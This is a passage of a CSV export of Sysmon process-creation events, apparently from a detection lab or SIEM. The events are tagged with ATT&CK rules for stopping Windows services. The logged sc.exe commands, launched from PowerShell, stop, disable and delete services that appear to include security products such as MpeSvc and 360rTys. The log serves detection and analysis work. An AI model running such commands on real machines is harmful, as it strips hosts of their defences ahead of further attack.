Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.112"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010387c2e00}"",""processId"":""3592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WifiService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:32.017",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.065 
+ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010c0792e00} +ProcessId: 7088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SRDSL +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.068917000Z"",""eventRecordID"":""3467"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.065\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010c0792e00}\r\nProcessId: 7088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\sc.exe\"" Stop SRDSL\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.065"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010c0792e00}"",""processId"":""7088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SRDSL"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 
2020 @ 14:20:31.991",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.046 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010f3782e00} +ProcessId: 2360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SRDSL Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.048452700Z"",""eventRecordID"":""3466"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.046\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010f3782e00}\r\nProcessId: 2360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SRDSL Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.046"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010f3782e00}"",""processId"":""2360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SRDSL Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:31.937",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:03.883 +ProcessGuid: {df9fc3d3-b3f3-5ecf-0000-0010f1762e00} +ProcessId: 6008 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop MpeSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
MpeSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.005512300Z"",""eventRecordID"":""3464"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:03.883\r\nProcessGuid: {df9fc3d3-b3f3-5ecf-0000-0010f1762e00}\r\nProcessId: 6008\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop MpeSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:03.883"",""processGuid"":""{df9fc3d3-b3f3-5ecf-0000-0010f1762e00}"",""processId"":""6008"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop MpeSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:31.890",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:03.723 +ProcessGuid: {df9fc3d3-b3f3-5ecf-0000-001007742e00} +ProcessId: 6836 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop IPSECS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:03.736872700Z"",""eventRecordID"":""3461"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:03.723\r\nProcessGuid: {df9fc3d3-b3f3-5ecf-0000-001007742e00}\r\nProcessId: 6836\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop IPSECS\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:03.723"",""processGuid"":""{df9fc3d3-b3f3-5ecf-0000-001007742e00}"",""processId"":""6836"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop IPSECS"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:31.859",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:03.652 +ProcessGuid: {df9fc3d3-b3f3-5ecf-0000-00102e722e00} +ProcessId: 4668 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 360rTys +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:03.656221700Z"",""eventRecordID"":""3459"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:03.652\r\nProcessGuid: {df9fc3d3-b3f3-5ecf-0000-00102e722e00}\r\nProcessId: 4668\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:03.652"",""processGuid"":""{df9fc3d3-b3f3-5ecf-0000-00102e722e00}"",""processId"":""4668"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete 360rTys"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:31.844",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:03.434 +ProcessGuid: {df9fc3d3-b3f3-5ecf-0000-0010e8702e00} +ProcessId: 7592 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop 360rTys +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:03.471685700Z"",""eventRecordID"":""3458"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:03.434\r\nProcessGuid: {df9fc3d3-b3f3-5ecf-0000-0010e8702e00}\r\nProcessId: 7592\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop 360rTys\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:03.434"",""processGuid"":""{df9fc3d3-b3f3-5ecf-0000-0010e8702e00}"",""processId"":""7592"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft 